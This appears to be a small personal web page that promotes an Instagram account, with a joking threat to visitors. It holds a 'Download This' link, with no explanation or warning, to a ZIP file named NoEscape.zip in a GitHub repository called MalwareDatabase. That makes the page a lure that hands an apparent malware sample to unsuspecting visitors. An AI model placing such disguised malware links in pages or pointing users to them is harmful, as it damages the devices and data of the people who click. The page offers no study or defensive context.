<!doctype html>
<html>
<head>
    <title>Qayidzaky</title>

    <meta charset="utf-8" />
    <meta http-equiv="Content-type" content="text/html; charset=utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
<style type="text/css">
    body {
        background-color: #f0f0f2;
        margin: 0;
        padding: 0;
        font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif;
        
    }
    div {
        width: 600px;
        margin: 5em auto;
        padding: 2em;
        background-color: #fdfdff;
        border-radius: 0.5em;
        box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);
    }
    a:link, a:visited {
        color: #dc2bb6;
        text-decoration: none;
    }
    @media (max-width: 700px) {
        div {
            margin: 0 auto;
            width: auto;
        }
    }

    </style>  

  
</head>

<body>
<div>
    <h1>QayidZaky</h1>
    <p>Follow Qayidzakynew. Or i beat u. Link in bellow</p>
    <p><a href="https://www.instagram.com/qayidzakynew">More information...</a></p>
        <p><a href="https://github.com/Endermanch/MalwareDatabase/raw/refs/heads/master/NoEscape.zip">Download This</a></p>
<a href="https://instagram.com/qayidzakynew" class="btn btn-primary" role="button" aria-pressed="true">Instagram Acc</a>


</div>
</body>
</html>
